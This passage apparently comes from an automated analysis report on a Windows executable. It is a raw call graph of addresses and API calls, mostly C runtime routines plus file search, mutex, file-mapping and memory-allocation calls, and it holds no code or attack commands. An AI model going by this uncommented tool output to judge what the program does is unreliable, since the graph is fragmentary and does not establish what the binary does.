LeaveCriticalSection 8869->8891 8871 fc21b2 8871->8841 8872->8855 8874 fba67d __dosmaperr 20 API calls 8873->8874 8877 fc1d7b 8874->8877 8875 fc1d88 8876 fba6da _free 20 API calls 8875->8876 8879 fc1dda 8876->8879 8877->8875 8883 fba986 8877->8883 8879->8855 8890 fbafc9 LeaveCriticalSection 8880->8890 8882 fc1eae 8882->8854 8884 fba714 __dosmaperr 5 API calls 8883->8884 8885 fba9ad 8884->8885 8886 fba9cb InitializeCriticalSectionAndSpinCount 8885->8886 8887 fba9b6 8885->8887 8886->8887 8888 fbdc5f _ValidateLocalCookies 5 API calls 8887->8888 8889 fba9e2 8888->8889 8889->8877 8890->8882 8891->8871 8893 fc07c4 8892->8893 8895 fc079e 8892->8895 8893->8782 8894 fc07ae FreeLibrary 8894->8895 8895->8893 8895->8894 8897 fbdebd GetStartupInfoW 8896->8897 8897->8734 8899 fb40d5 8898->8899 8900 fb3ee8 8898->8900 8899->8753 8901 fb3ef9 8900->8901 8903 fb40ec 8900->8903 8942 fb3450 8901->8942 8903->8899 8905 fb414e CreateFileMappingA 8903->8905 8906 fb4135 8905->8906 8906->8903 8907 fc8570 2 API calls 8908 fb4007 8907->8908 8948 fb47e0 8908->8948 8913 fc5cbb 8912->8913 8915 fc5631 8912->8915 8914 fc5d0e ReadFile 8913->8914 8913->8915 8914->8915 8915->8745 8917 fc77a4 8916->8917 8921 fb2336 8916->8921 8918 fc7819 8917->8918 8917->8921 8974 fb2800 8918->8974 8920 fc78bf 8920->8921 8921->8755 8923 fb396b 8922->8923 8924 fb36fa 8922->8924 8926 fb2800 4 API calls 8923->8926 8925 fb2800 4 API calls 8924->8925 8927 fb374f 8925->8927 8928 fb3a1a CreateMutexA GetModuleHandleA 8926->8928 8980 fb1000 8927->8980 8930 fc5ea0 FindFirstFileA 8928->8930 8933 fb3841 8930->8933 8932 fb2590 2 API calls 8932->8933 8933->8746 8935 fc85e5 8934->8935 8936 fc8747 CreateFileA 8934->8936 8937 fc5ea0 FindFirstFileA 8935->8937 8938 fc883c 8936->8938 8939 fc8642 8937->8939 8938->8753 8939->8938 8941 fc62e3 8940->8941 8941->8748 8943 fb35fc 8942->8943 8944 fb34a4 8942->8944 8943->8907 8945 fb354e 8944->8945 8956 fb3d10 8944->8956 8945->8943 8947 fb363a GetModuleFileNameA 8945->8947 8947->8943 8949 fb4849 8948->8949 8951 fb406c 8948->8951 8950 fb4889 VirtualAlloc 8949->8950 8949->8951 8950->8951 8952 fb14c0 8951->8952 8953 fb153d 8952->8953 8954 fb1588 8953->8954 8966 fc8850 8953->8966 8954->8899 8957 fb3d72 8956->8957 8958 fb3d80 8956->8958 8957->8958 8960 fb2590 8957->8960 8958->8945 8963 fb2627 8960->8963 8965 fb2606 8960->8965 8961 fb2763 8961->8957 8962 fb27c2 GetCurrentActCtx 8962->8961 8963->8961 8963->8962 8964 fb274b GetCommandLineA 8964->8965 8965->8963 8965->8964 8967 fc8a81 8966->8967 8969 fc88ba 8966->8969 8967->8969 8970 fc5ea0 8967->8970 8969->8953 8971 fc5ef4 8970->8971 8972 fc5f4c 8971->8972 8973 fc5fa8 FindFirstFileA 8971->8973 8972->8969 8973->8971 8975 fb2861 8974->8975 8976 fb2b35 8974->8976 8977 fc8850 FindFirstFileA 8975->8977 8978 fb2b12 8976->8978 8979 fb2b67 GetCurrentActCtx CreateFileA WideCharToMultiByte 8976->8979 8977->8978 8978->8920 8979->8920 8981 fb106a 8980->8981 8988 fb122f 8980->8988 8982 fb107c 8981->8982 8983 fb1286 8981->8983 8989 fc8330 8982->8989 8985 fb12c7 WideCharToMultiByte CreateFileMappingA CreateMutexA 8983->8985 8983->8988 8985->8988 8988->8932 8990 fc838d 8989->8990 8991 fb110b 8989->8991 8992 fc839f 8990->8992 8995 fc8489 8990->8995 8996 fb3250 8991->8996 9002 fb3c20 8992->9002 8994 fc84cc SetHandleInformation 8994->8995 8995->8991 8995->8994 8997 fb32bb 8996->8997 9000 fb32c8 8996->9000 8999 fb32ea CloseHandle 8997->8999 8997->9000 8998 fb331a 8998->8988 8999->9000 9000->8998 9001 fb33f5 FindNextFileA 9000->9001 9001->9000 9003 fb3c97 ReleaseMutex 9002->9003 9004 fb3c77 9002->9004 9003->9004 9004->8991 7998 fbdadb 8003 fbdedd SetUnhandledExceptionFilter 7998->8003 8000 fbdae0 pre_c_initialization 8004 fbc748 8000->8004 8002 fbdaeb 8003->8000 8005 fbc76e 8004->8005 8006 fbc754 8004->8006 8005->8002 8006->8005 8011 fb9826 8006->8011 8017 fb9cb4 GetLastError 8011->8017 8014 fb976a 8250 fb96ef 8014->8250 8016 fb9776 8016->8002 8018 fb9cd3 8017->8018 8019 fb9ccd 8017->8019 8023 fb9d2a SetLastError 8018->8023 8043 fba67d 8018->8043 8036 fba8d7 8019->8036 8025 fb982b 8023->8025 8024 fb9ced 8050 fba6da 8024->8050 8025->8014 8029 fb9cf3 8031 fb9d21 SetLastError 8029->8031 8030 fb9d09 8063 fb9aa2 8030->8063 8031->8025 8034 fba6da _free 17 API calls 8035 fb9d1a 8034->8035 8035->8023 8035->8031 8068 fba714 8036->8068 8039 fba916 TlsGetValue 8040 fba90a 8039->8040 8075 fbdc5f 8040->8075 8042 fba927 8042->8018 8048 fba68a __dosmaperr 8043->8048 8044 fba6ca 8047 fb9826 __dosmaperr 19 API calls 8044->8047 8045 fba6b5 RtlAllocateHeap 8046 fb9ce5 8045->8046 8045->8048 8046->8024 8056 fba92d 8046->8056 8047->8046 8048->8044 8048->8045 8090 fbc6ac 8048->8090 8051 fba70e __dosmaperr 8050->8051 8052 fba6e5 HeapFree 8050->8052 8051->8029 8052->8051 8053 fba6fa 8052->8053 8054 fb9826 __dosmaperr 18 API calls 8053->8054 8055 fba700 GetLastError 8054->8055 8055->8051 8057 fba714 __dosmaperr 5 API calls 8056->8057 8058 fba954 8057->8058 8059 fba96f TlsSetValue 8058->8059 8062 fba963 8058->8062 8059->8062 8060 fbdc5f _ValidateLocalCookies 5 API calls 8061 fb9d02 8060->8061 8061->8024 8061->8030 8062->8060 8106 fb9a7a 8063->8106 8069 fba740 8068->8069 8070 fba744 8068->8070 8069->8070 8073 fba764 8069->8073 8082 fba7b0 8069->8082 8070->8039 8070->8040 8072 fba770 GetProcAddress 8074 fba780 try_get_function 8072->8074 8073->8070 8073->8072 8074->8070 8076 fbdc6a IsProcessorFeaturePresent 8075->8076 8077 fbdc68 8075->8077 8079 fbdfd7 8076->8079 8077->8042 8089 fbdf9b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8079->8089 8081 fbe0ba 8081->8042 8083 fba7d1 LoadLibraryExW 8082->8083 8088 fba7c6 8082->8088 8084 fba7ee GetLastError 8083->8084 8085 fba806 8083->8085 8084->8085 8086 fba7f9 LoadLibraryExW 8084->8086 8087 fba81d FreeLibrary 8085->8087 8085->8088 8086->8085 8087->8088 8088->8069 8089->8081 8095 fbc6f0 8090->8095 8092 fbdc5f _ValidateLocalCookies 5 API calls 8093 fbc6ec 8092->8093 8093->8048 8094 fbc6c2 8094->8092 8096 fbc6fc ___scrt_is_nonwritable_in_current_image 8095->8096 8101 fbaf81 EnterCriticalSection 8096->8101 8098 fbc707 8102 fbc739 8098->8102 8100 fbc72e ___scrt_is_nonwritable_in_current_image 8100->8094 8101->8098 8105 fbafc9 LeaveCriticalSection 8102->8105 8104 fbc740 8104->8100 8105->8104 8112 fb99ba 8106->8112 8108 fb9a9e 8109 fb9a2a 8108->8109 8123 fb98be 8109->8123 8111 fb9a4e 8111->8034 8113 fb99c6 ___scrt_is_nonwritable_in_current_image 8112->8113 8118 fbaf81 EnterCriticalSection 8113->8118 8115 fb99d0 8119 fb99f6 8115->8119 8117 fb99ee ___scrt_is_nonwritable_in_current_image 8117->8108 8118->8115 8122 fbafc9 LeaveCriticalSection 8119->8122 8121 fb9a00 8121->8117 8122->8121 8124 fb98ca ___scrt_is_nonwritable_in_current_image 8123->8124 8131 fbaf81 EnterCriticalSection 8124->8131 8126 fb98d4 8132 fb9be5 8126->8132 8128 fb98ec 8136 fb9902 8128->8136 8130 fb98fa ___scrt_is_nonwritable_in_current_image 8130->8111 8131->8126 8133 fb9c1b __fassign 8132->8133 8134 fb9bf4 __fassign 8132->8134 8133->8128 8134->8133 8139 fbac2c 8134->8139 8249 fbafc9 LeaveCriticalSection 8136->8249 8138 fb990c 8138->8130 8145 fbac42 8139->8145 8164 fbacac 8139->8164 8140 fbacfa 8207 fbad9f 8140->8207 8142 fba6da _free 20 API calls 8144 fbacce 8142->8144 8143 fbac75 8146 fbac97 8143->8146 8151 fba6da _free 20 API calls 8143->8151 8147 fba6da _free 20 API calls 8144->8147 8145->8143 8149 fba6da _free 20 API calls 8145->8149 8145->8164 8148 fba6da _free 20 API calls 8146->8148 8150 fbace1 8147->8150 8153 fbaca1 8148->8153 8155 fbac6a 8149->8155 8152 fba6da _free 20 API calls 8150->8152 8157 fbac8c 8151->8157 8158 fbacef 8152->8158 8159 fba6da _free 20 API calls 8153->8159 8154 fbad68 8160 fba6da _free 20 API calls 8154->8160 8167 fbba92 8155->8167 8156 fbad08 8156->8154 8166 fba6da 20 API calls _free 8156->8166 8195 fbbb90 8157->8195 8163 fba6da _free 20 API calls 8158->8163 8159->8164 8165 fbad6e 8160->8165 8163->8140 8164->8140 8164->8142 8165->8133 8166->8156 8168 fbbb8c 8167->8168 8169 fbbaa3 8167->8169 8168->8143 8170 fbbab4 8169->8170 8171 fba6da _free 20 API calls 8169->8171 8172 fbbac6 8170->8172 8173 fba6da _free 20 API calls 8170->8173 8171->8170 8174 fbbad8 8172->8174 8175 fba6da _free 20 API calls 8172->8175 8173->8172 8176 fbbaea 8174->8176 8177 fba6da _free 20 API calls 8174->8177 8175->8174 8178 fbbafc 8176->8178 8179 fba6da _free 20 API calls 8176->8179 8177->8176 8180 fbbb0e 8178->8180 8181 fba6da _free 20 API calls 8178->8181 8179->8178 8182 fbbb20 8180->8182 8183 fba6da _free 20 API calls 8180->8183 8181->8180 8184 fbbb32 8182->8184 8185 fba6da _free 20 API calls 8182->8185 8183->8182 8186 fbbb44 8184->8186 8187 fba6da _free 20 API calls 8184->8187 8185->8184 8188 fbbb56 8186->8188 8189 fba6da _free 20 API calls 8186->8189 8187->8186 8190 fbbb68 8188->8190 8191 fba6da _free 20 API calls 8188->8191 8189->8188 8192 fbbb7a 8190->8192 8193 fba6da _free 20 API calls 8190->8193 8191->8190 8192->8168 8194 fba6da _free 20 API calls 8192->8194 8193->8192 8194->8168 8196 fbbb9d 8195->8196 8206 fbbbf5 8195->8206 8197 fbbbad 8196->8197 8198 fba6da _free 20 API calls 8196->8198 8199 fbbbbf 8197->8199 8200 fba6da _free 20 API calls 8197->8200 8198->8197 8201 fba6da _free 20 API calls 8199->8201 8202 fbbbd1 8199->8202 8200->8199 8201->8202 8203 fba6da _free 20 API calls 8202->8203 8204 fbbbe3 8202->8204 8203->8204 8205 fba6da _free 20 API calls 8204->8205 8204->8206 8205->8206 8206->8146 8208 fbadca 8207->8208 8209 fbadac 8207->8209 8208->8156 8209->8208 8213 fbbc35 8209->8213 8212 fba6da _free 20 API calls 8212->8208 8214 fbadc4 8213->8214 8215 fbbc46 8213->8215 8214->8212 8216 fbbbf9 __fassign 20 API calls 8215->8216 8217 fbbc4e 8216->8217 8218 fbbbf9 __fassign 20 API calls 8217->8218 8219 fbbc59 8218->8219 8220 fbbbf9 __fassign 20 API calls 8219->8220 8221 fbbc64 8220->8221 8222 fbbbf9 __fassign 20 API calls 8221->8222 8223 fbbc6f 8222->8223 8224 fbbbf9 __fassign 20 API calls 8223->8224 8225 fbbc7d 8224->8225 8226 fba6da _free 20 API calls 8225->8226 8227 fbbc88 8226->8227 8228 fba6da _free 20 API calls 8227->8228 8229 fbbc93 8228->8229 8230 fba6da _free 20 API calls 8229->8230 8231 fbbc9e 8230->8231 8232 fbbbf9 __fassign 20 API calls 8231->8232 8233 fbbcac 8232->8233 8234 fbbbf9 __fassign 20 API calls 8233->8234 8235 fbbcba 8234->8235 8236 fbbbf9 __fassign 20 API calls 8235->8236 8237 fbbccb 8236->8237 8238 fbbbf9 __fassign 20 API calls 8237->8238 8239 fbbcd9 8238->8239 8240 fbbbf9 __fassign 20 API calls 8239->8240 8241 fbbce7 8240->8241 8242 fba6da _free 20 API calls 8241->8242 8243 fbbcf2 8242->8243 8244 fba6da _free 20 API calls 8243->8244 8245 fbbcfd 8244->8245 8246 fba6da _free 20 API calls 8245->8246 8247 fbbd08 8246->8247 8248 fba6da _free 20 API calls 8247->8248 8248->8214 8249->8138 8251 fb9cb4 __dosmaperr 20 API calls 8250->8251 8252 fb9705 8251->8252 8253 fb9713 8252->8253 8254 fb9764 8252->8254 8259 fbdc5f _ValidateLocalCookies 5 API calls 8253->8259 8261 fb977a IsProcessorFeaturePresent 8254->8261 8256 fb9769 8257 fb96ef ___std_exception_copy 26 API calls 8256->8257 8258 fb9776 8257->8258 8258->8016 8260 fb973a 8259->8260 8260->8016 8262 fb9785 8261->8262 8265 fb95a0 8262->8265 8266 fb95bc _abort ___scrt_get_show_window_mode 8265->8266 8267 fb95e8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8266->8267 8268 fb96b9 _abort 8267->8268 8269 fbdc5f _ValidateLocalCookies 5 API calls 8268->8269 8270 fb96d7 GetCurrentProcess TerminateProcess 8269->8270 8270->8256 9005 fc12db 9014 fc1d19 GetEnvironmentStringsW 9005->9014 9009 fc12fe 9012 fba6da _free 20 API calls 9009->9012 9010 fba6da _free 20 API calls 9011 fc1328 9010->9011 9013 fc12f3 9012->9013 9013->9010 9015 fc1d2d 9014->9015 9016 fc12ed 9014->9016 9017 fbbd19 __onexit 21 API calls 9015->9017 9016->9013 9021 fc132e 9016->9021 9018 fc1d41 9017->9018 9019 fba6da _free 20 API calls 9018->9019 9020 fc1d5b FreeEnvironmentStringsW 9019->9020 9020->9016 9023 fc134c 9021->9023 9022 fba67d __dosmaperr 20 API calls 9033 fc1386 9022->9033 9023->9022 9023->9023 9024 fc13f7 9025 fba6da _free 20 API calls 9024->9025 9026 fc1411 9025->9026 9026->9009 9027 fba67d __dosmaperr 20 API calls 9027->9033 9028 fc13f9 9047 fc1428 9028->9047 9032 fba6da _free 20 API calls 9032->9024 9033->9024 9033->9027 9033->9028 9034 fc141b 9033->9034 9036 fba6da _free 20 API calls 9033->9036 9038 fbbd67 9033->9038 9035 fb977a ___std_exception_copy 11 API calls 9034->9035 9037 fc1427 9035->9037 9036->9033 9039 fbbd82 9038->9039 9040 fbbd74 9038->9040 9041 fb9826 __dosmaperr 20 API calls 9039->9041 9040->9039 9043 fbbd9b 9040->9043 9046 fbbd8c 9041->9046 9042 fb976a ___std_exception_copy 26 API calls 9044 fbbd96 9042->9044 9043->9044 9045 fb9826 __dosmaperr 20 API calls 9043->9045 9044->9033 9045->9046 9046->9042 9048 fc13ff 9047->9048 9049 fc1435 9047->9049 9048->9032 9050 fc144c 9049->9050 9051 fba6da _free 20 API calls 9049->9051 9052 fba6da _free 20 API calls 9050->9052 9051->9049 9052->9048 8271 fbb4bb 8274 fbb3b9 8271->8274 8294 fb9c30 GetLastError 8274->8294 8276 fbb3c6 8314 fbb4d8 8276->8314 8278 fbb3ce 8323 fbb14d 8278->8323 8281 fbb3e5 8284 fbb428 8287 fba6da _free 20 API calls 8284->8287 8287->8281 8288 fbb423 8289 fb9826 __dosmaperr 20 API calls 8288->8289 8289->8284 8290 fbb46c 8290->8284 8347 fbb023 8290->8347 8291 fbb440 8291->8290 8292 fba6da _free 20 API calls 8291->8292 8292->8290 8295 fb9c4c 8294->8295 8296 fb9c46 8294->8296 8298 fba67d __dosmaperr 20 API calls 8295->8298 8300 fb9c9b SetLastError 8295->8300 8297 fba8d7 __dosmaperr 11 API calls 8296->8297 8297->8295 8299 fb9c5e 8298->8299 8301 fb9c66 8299->8301 8302 fba92d __dosmaperr 11 API calls 8299->8302 8300->8276 8304 fba6da _free 20 API calls 8301->8304 8303 fb9c7b 8302->8303 8303->8301 8305 fb9c82 8303->8305 8306 fb9c6c 8304->8306 8308 fb9aa2 __dosmaperr 20 API calls 8305->8308 8307 fb9ca7 SetLastError 8306->8307 8350 fba63a 8307->8350 8309 fb9c8d 8308->8309 8311 fba6da _free 20 API calls 8309->8311 8313 fb9c94 8311->8313 8313->8300 8313->8307 8315 fbb4e4 ___scrt_is_nonwritable_in_current_image 8314->8315 8316 fb9c30 _abort 47 API calls 8315->8316 8321 fbb4ee 8316->8321 8318 fbb572 ___scrt_is_nonwritable_in_current_image 8318->8278 8319 fba63a _abort 47 API calls 8319->8321 8321->8318 8321->8319 8322 fba6da _free 20 API calls 8321->8322 8537 fbaf81 EnterCriticalSection 8321->8537 8538 fbb569 8321->8538 8322->8321 8542 fb5e73 8323->8542 8326 fbb16e GetOEMCP 8328 fbb197 8326->8328 8327 fbb180 8327->8328 8329 fbb185 GetACP 8327->8329 8328->8281 8330 fbbd19 8328->8330 8329->8328 8331 fbbd57 8330->8331 8335 fbbd27 __dosmaperr 8330->8335 8332 fb9826 __dosmaperr 20 API calls 8331->8332 8334 fbb3f6 8332->8334 8333 fbbd42 RtlAllocateHeap 8333->8334 8333->8335 8334->8284 8337 fbb57a 8334->8337 8335->8331 8335->8333 8336 fbc6ac __dosmaperr 7 API calls 8335->8336 8336->8335 8338 fbb14d 49 API calls 8337->8338 8340 fbb599 8338->8340 8339 fbb60f ___scrt_get_show_window_mode 8579 fbb225 GetCPInfo 8339->8579 8340->8339 8343 fbb5ea IsValidCodePage 8340->8343 8345 fbb5a0 8340->8345 8341 fbdc5f _ValidateLocalCookies 5 API calls 8342 fbb41b 8341->8342 8342->8288 8342->8291 8344 fbb5fc GetCPInfo 8343->8344 8343->8345 8344->8339 8344->8345 8345->8341 8655 fbafe0 8347->8655 8349 fbb047 8349->8284 8359 fbc435 8350->8359 8353 fba654 IsProcessorFeaturePresent 8356 fba63f 8353->8356 8355 fb95a0 _abort 8 API calls 8355->8356 8356->8350 8356->8353 8356->8355 8358 fb9cb3 8356->8358 8362 fbc490 8356->8362 8389 fbc2e5 8356->8389 8392 fbf424 8356->8392 8408 fbc3a3 8359->8408 8363 fbc49c _abort 8362->8363 8364 fbc4c3 _abort 8363->8364 8365 fb9cb4 __dosmaperr 20 API calls 8363->8365 8369 fbc4c9 _abort 8363->8369 8366 fbc515 8364->8366 8364->8369 8388 fbc4f8 8364->8388 8365->8364 8367 fb9826 __dosmaperr 20 API calls 8366->8367 8368 fbc51a 8367->8368 8370 fb976a ___std_exception_copy 26 API calls 8368->8370 8374 fbc541 8369->8374 8422 fbaf81 EnterCriticalSection 8369->8422 8370->8388 8376 fbc5a0 8374->8376 8377 fbc598 8374->8377 8385 fbc5cb 8374->8385 8423 fbafc9 LeaveCriticalSection 8374->8423 8376->8385 8424 fbc487 8376->8424 8380 fbc2e5 _abort 28 API calls 8377->8380 8380->8376 8382 fb9c30 _abort 47 API calls 8386 fbc62e 8382->8386 8384 fbc487 _abort 47 API calls 8384->8385 8427 fbc650 8385->8427 8387 fb9c30 _abort 47 API calls 8386->8387 8386->8388 8387->8388 8431 fbe2e9 8388->8431 8435 fbc0b0 8389->8435 8393 fbf42d 8392->8393 8394 fbf430 GetLastError 8392->8394 8393->8356 8514 fc069e 8394->8514 8396 fbf445 8397 fbf464 8396->8397 8398 fbf4aa SetLastError 8396->8398 8519 fc06d8 8396->8519 8397->8398 8398->8356 8400 fbf45e 8400->8397 8401 fba67d __dosmaperr 20 API calls 8400->8401 8402 fbf472 8401->8402 8403 fbf486 8402->8403 8404 fc06d8 ___vcrt_FlsSetValue 6 API calls 8402->8404 8405 fc06d8 ___vcrt_FlsSetValue 6 API calls 8403->8405 8406 fbf49a 8403->8406 8404->8403 8405->8406 8407 fba6da _free 20 API calls 8406->8407 8407->8397 8411 fbc349 8408->8411 8410 fbc3c7 8410->8356 8412 fbc355 ___scrt_is_nonwritable_in_current_image 8411->8412 8417 fbaf81 EnterCriticalSection 8412->8417 8414 fbc363 8418 fbc397 8414->8418 8416 fbc38a ___scrt_is_nonwritable_in_current_image 8416->8410 8417->8414 8421 fbafc9 LeaveCriticalSection 8418->8421 8420 fbc3a1 8420->8416 8421->8420 8422->8374 8423->8377 8425 fb9c30 _abort 47 API calls 8424->8425 8426 fbc48c 8425->8426 8426->8384 8428 fbc61f 8427->8428 8429 fbc656 8427->8429 8428->8382 8428->8386 8428->8388 8434 fbafc9 LeaveCriticalSection 8429->8434 8432 fbdc5f _ValidateLocalCookies 5 API calls 8431->8432 8433 fbe2f4 8432->8433 8433->8433 8434->8428 8436 fbc0bc _abort 8435->8436 8437 fbc0d4 8436->8437 8457 fbc20a GetModuleHandleW 8436->8457 8466 fbaf81 EnterCriticalSection 8437->8466 8441 fbc17a 8474 fbc1ba 8441->8474 8444 fbc0dc 8444->8441 8446 fbc151 8444->8446 8467 fbd6e4 8444->8467 8447 fbc169 8446->8447 8470 fbd2da 8446->8470 8452 fbd2da _abort 5 API calls 8447->8452 8448 fbc1c3 8450 fbe2e9 _abort 5 API calls 8448->8450 8449 fbc197 8477 fbc1c9 8449->8477 8455 fbc1c8 8450->8455 8452->8441 8455->8356 8458 fbc0c8 8457->8458 8458->8437 8459 fbc24e GetModuleHandleExW 8458->8459 8460 fbc278 GetProcAddress 8459->8460 8461 fbc28d 8459->8461 8460->8461 8462 fbc2aa 8461->8462 8463 fbc2a1 FreeLibrary 8461->8463 8464 fbdc5f _ValidateLocalCookies 5 API calls 8462->8464 8463->8462 8465 fbc2b4 8464->8465 8465->8437 8466->8444 8485 fbd41d 8467->8485 8471 fbd309 8470->8471 8472 fbdc5f _ValidateLocalCookies 5 API calls 8471->8472 8473 fbd332 8472->8473 8473->8447 8507 fbafc9 LeaveCriticalSection 8474->8507 8476 fbc193 8476->8448 8476->8449 8508 fbaaf2 8477->8508 8480 fbc1f7 8482 fbc24e _abort 8 API calls 8480->8482 8481 fbc1d7 GetPEB 8481->8480 8483 fbc1e7 GetCurrentProcess TerminateProcess 8481->8483 8484 fbc1ff ExitProcess 8482->8484 8483->8480 8488 fbd3cc 8485->8488 8487 fbd441 8487->8446 8489 fbd3d8 ___scrt_is_nonwritable_in_current_image 8488->8489 8496 fbaf81 EnterCriticalSection 8489->8496 8491 fbd3e6 8497 fbd46d 8491->8497 8495 fbd404 ___scrt_is_nonwritable_in_current_image 8495->8487 8496->8491 8498 fbd48d 8497->8498 8499 fbd495 8497->8499 8500 fbdc5f _ValidateLocalCookies 5 API calls 8498->8500 8499->8498 8502 fba6da _free 20 API calls 8499->8502 8501 fbd3f3 8500->8501 8503 fbd411 8501->8503 8502->8498 8506 fbafc9 LeaveCriticalSection 8503->8506 8505 fbd41b 8505->8495 8506->8505 8507->8476 8509 fbab17 8508->8509 8513 fbab0d 8508->8513 8510 fba714 __dosmaperr 5 API calls 8509->8510 8510->8513 8511 fbdc5f _ValidateLocalCookies 5 API calls 8512 fbab75 8511->8512 8512->8480 8512->8481 8513->8511 8524 fc0509 8514->8524 8516 fc06b8 8517 fc06cf TlsGetValue 8516->8517 8518 fc06c4 8516->8518 8517->8518 8518->8396 8520 fc0509 try_get_function 5 API calls 8519->8520 8521 fc06f2 8520->8521 8522 fc070c TlsSetValue 8521->8522 8523 fc0701 8521->8523 8522->8523 8523->8400 8528 fc0539 8524->8528 8529 fc053d try_get_function 8524->8529 8525 fc055d 8527 fc0569 GetProcAddress 8525->8527 8525->8529 8527->8529 8528->8525 8528->8529 8530 fc05a9 8528->8530 8529->8516 8531 fc05c6 8530->8531 8532 fc05d1 LoadLibraryExW 8530->8532 8531->8528 8533 fc05ed GetLastError 8532->8533 8535 fc0605 8532->8535 8534 fc05f8 LoadLibraryExW 8533->8534 8533->8535 8534->8535 8535->8531 8536 fc061c FreeLibrary 8535->8536 8536->8531 8537->8321 8541 fbafc9 LeaveCriticalSection 8538->8541 8540 fbb570 8540->8321 8541->8540 8543 fb5e90 8542->8543 8544 fb5e86 8542->8544 8543->8544 8545 fb9c30 _abort 47 API calls 8543->8545 8544->8326 8544->8327 8546 fb5eb1 8545->8546 8550 fb9d7f 8546->8550 8551 fb9d92 8550->8551 8553 fb5eca 8550->8553 8551->8553 8558 fbae79 8551->8558 8554 fb9dac 8553->8554 8555 fb9dbf 8554->8555 8556 fb9dd4 8554->8556 8555->8556 8557 fbb4d8 __fassign 47 API calls 8555->8557 8556->8544 8557->8556 8559 fbae85 ___scrt_is_nonwritable_in_current_image 8558->8559 8560 fb9c30 _abort 47 API calls 8559->8560 8561 fbae8e 8560->8561 8562 fbaedc ___scrt_is_nonwritable_in_current_image 8561->8562 8570 fbaf81 EnterCriticalSection 8561->8570 8562->8553 8564 fbaeac 8571 fbaef0 8564->8571 8569 fba63a _abort 47 API calls 8569->8562 8570->8564 8572 fbaefe __fassign 8571->8572 8574 fbaec0 8571->8574 8573 fbac2c __fassign 20 API calls 8572->8573 8572->8574 8573->8574 8575 fbaedf 8574->8575 8578 fbafc9 LeaveCriticalSection 8575->8578 8577 fbaed3 8577->8562 8577->8569 8578->8577 8580 fbb309 8579->8580 8581 fbb25f 8579->8581 8583 fbdc5f _ValidateLocalCookies 5 API calls 8580->8583 8589 fba4fd 8581->8589 8585 fbb3b5 8583->8585 8585->8345 8588 fbcaa6 53 API calls 8588->8580 8590 fb5e73 __fassign 47 API calls 8589->8590 8591 fba51d MultiByteToWideChar 8590->8591 8593 fba5f3 8591->8593 8594 fba55b 8591->8594 8595 fbdc5f _ValidateLocalCookies 5 API calls 8593->8595 8596 fbbd19 __onexit 21 API calls 8594->8596 8599 fba57c __alloca_probe_16 ___scrt_get_show_window_mode 8594->8599 8597 fba616 8595->8597 8596->8599 8603 fbcaa6 8597->8603 8598 fba5ed 8608 fba61a 8598->8608 8599->8598 8601 fba5c1 MultiByteToWideChar 8599->8601 8601->8598 8602 fba5dd GetStringTypeW 8601->8602 8602->8598 8604 fb5e73 __fassign 47 API calls 8603->8604 8605 fbcab9 8604->8605 8612 fbc889 8605->8612 8609 fba637 8608->8609 8610 fba626 8608->8610 8609->8593 8610->8609 8611 fba6da _free 20 API calls 8610->8611 8611->8609 8613 fbc8a4 8612->8613 8614 fbc8ca MultiByteToWideChar 8613->8614 8616 fbc8f4 8614->8616 8626 fbca7e 8614->8626 8615 fbdc5f _ValidateLocalCookies 5 API calls 8617 fbb2e1 8615->8617 8618 fbbd19 __onexit 21 API calls 8616->8618 8622 fbc915 __alloca_probe_16 8616->8622 8617->8588 8618->8622 8619 fbc95e MultiByteToWideChar 8620 fbc9ca 8619->8620 8621 fbc977 8619->8621 8624 fba61a __freea 20 API calls 8620->8624 8639 fba9e8 8621->8639 8622->8619 8622->8620 8624->8626 8626->8615 8627 fbc9d9 8631 fbbd19 __onexit 21 API calls 8627->8631 8634 fbc9fa __alloca_probe_16 8627->8634 8628 fbc9a1 8628->8620 8629 fba9e8 12 API calls 8628->8629 8629->8620 8630 fbca6f 8633 fba61a __freea 20 API calls 8630->8633 8631->8634 8632 fba9e8 12 API calls 8635 fbca4e 8632->8635 8633->8620 8634->8630 8634->8632 8635->8630 8636 fbca5d WideCharToMultiByte 8635->8636 8636->8630 8637 fbca9d 8636->8637 8638 fba61a __freea 20 API calls 8637->8638 8638->8620 8640 fba714 __dosmaperr 5 API calls 8639->8640 8641 fbaa0f 8640->8641 8642 fbaa18 LCMapStringEx 8641->8642 8643 fbaa3f 8641->8643 8647 fbaa5f 8642->8647 8650 fbaa70 8643->8650 8648 fbdc5f _ValidateLocalCookies 5 API calls 8647->8648 8649 fbaa6a 8648->8649 8649->8620 8649->8627 8649->8628 8651 fba714 __dosmaperr 5 API calls 8650->8651 8652 fbaa97 8651->8652 8653 fbdc5f _ValidateLocalCookies 5 API calls 8652->8653 8654 fbaa58 LCMapStringW 8653->8654 8654->8647 8656 fbafec ___scrt_is_nonwritable_in_current_image 8655->8656 8663 fbaf81 EnterCriticalSection 8656->8663 8658 fbaff6 8664 fbb04b 8658->8664 8662 fbb00f ___scrt_is_nonwritable_in_current_image 8662->8349 8663->8658 8676 fbb76b 8664->8676 8666 fbb099 8667 fbb76b 26 API calls 8666->8667 8668 fbb0b5 8667->8668 8669 fbb76b 26 API calls 8668->8669 8670 fbb0d3 8669->8670 8671 fbb003 8670->8671 8672 fba6da _free 20 API calls 8670->8672 8673 fbb017 8671->8673 8672->8671 8690 fbafc9 LeaveCriticalSection 8673->8690 8675 fbb021 8675->8662 8677 fbb77c 8676->8677 8686 fbb778 8676->8686 8678 fbb783 8677->8678 8681 fbb796 ___scrt_get_show_window_mode 8677->8681 8679 fb9826 __dosmaperr 20 API calls 8678->8679 8680 fbb788 8679->8680 8682 fb976a ___std_exception_copy 26 API calls 8680->8682 8683 fbb7cd 8681->8683 8684 fbb7c4 8681->8684 8681->8686 8682->8686 8683->8686 8688 fb9826 __dosmaperr 20 API calls 8683->8688 8685 fb9826 __dosmaperr 20 API calls 8684->8685 8687 fbb7c9 8685->8687 8686->8666 8689 fb976a ___std_exception_copy 26 API calls 8687->8689 8688->8687 8689->8686 8690->8675 10196 fbda2f 10197 fbda37 pre_c_initialization 10196->10197 10214 fc154f 10197->10214 10199 fbda42 pre_c_initialization 10221 fbe3ac 10199->10221 10201 fbdacb 10202 fbdd8f ___scrt_fastfail 4 API calls 10201->10202 10203 fbdad2 ___scrt_initialize_default_local_stdio_options 10202->10203 10204 fbda57 __RTC_Initialize 10204->10201 10226 fbe54d 10204->10226 10206 fbda70 pre_c_initialization 10206->10201 10207 fbda81 10206->10207 10229 fbe60b InitializeSListHead 10207->10229 10209 fbda86 pre_c_initialization 